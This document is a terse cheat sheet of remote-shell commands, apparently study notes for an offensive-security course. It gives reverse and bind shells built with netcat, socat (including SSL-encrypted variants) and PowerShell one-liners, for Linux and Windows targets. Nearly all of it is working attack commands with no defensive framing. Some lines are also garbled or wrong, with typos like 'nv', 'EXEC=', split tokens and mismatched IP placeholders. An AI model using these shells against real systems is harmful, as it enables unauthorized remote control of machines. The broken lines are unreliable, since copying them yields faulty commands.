-------------------------------------------------------------------

** Netcat reverse shell **

Remote machine:
$ nc -nv local_machine_ip 4444 -e /bin/sh

Local machine
$ nv -nvlp 4444 

-------------------------------------------------------------------

** Netcat bind shell **

Remote machine:
C:\Users\offsec> nc -nlvp 4444 -e cmd.exe

Local machine
$nc -nv remote_machine_ip 4444

-------------------------------------------------------------------

** Socat bind shell

Remote machine
$ socat TCP-LISTEN:4444 EXEC:/bin/sh

C:\>Users\offsec> socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes

Local machine
$ socat - TCP4:remote_machine_ip:4444

-------------------------------------------------------------------

** Socat Reverse shell

Local machine
$ socat -d -d TCP-LISTEN:4444 STDOUT

Remote machine
$ socat TCP4:remote_machine_ip:4444 EXEC:/bin/bash

C:\Users\offsec> socat TCP4:192.168.168.1:4443 EXEC:'cmd.exe',pipes.

-------------------------------------------------------------------

** SSL Socat bind shell

Listener machine

- Create self-signed cert and key
$ openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36 2 -out bind_shell.crt

- Combine key and cert into a single .pem file:
$ cat bind_shell.key bind_shell.crt > bind_shell.pem

- Listen for connections
$ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin /bash

C:\Users\offsec> socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:'cmd.exe',pipes

Client machine
$ socat - OPENSSL:remote_ip:443,verify=0

-------------------------------------------------------------------
** SSL SOCAT REVERSE SHELL

Local machine
$ socat -d -d OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork STDOUT

Remote machine
$ socat OPENSSL:local_machine:ip:4443,verify=0 EXEC=/bin/sh
C:\Users\far2ed> $ socat OPENSSL:local_machine:ip:4443,verify=0 EXEC:'cmd.exe',pipes

-------------------------------------------------------------------
** Powershell reverse shell

Local machine
nc -nlvp 443

Remote machine
C:\Users\offsec> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('local_machine_ip',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()"

-------------------------------------------------------------------
** Powershell bind shell

Remote machine
C:\Users\offsec> powershell -c "$listener = New-Object System.Net.Sockets.TcpListener( '0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $clie nt.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt es.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString ($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$str eam.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Sto p()"

Local machine
nc -nv remote_machine_ip 443
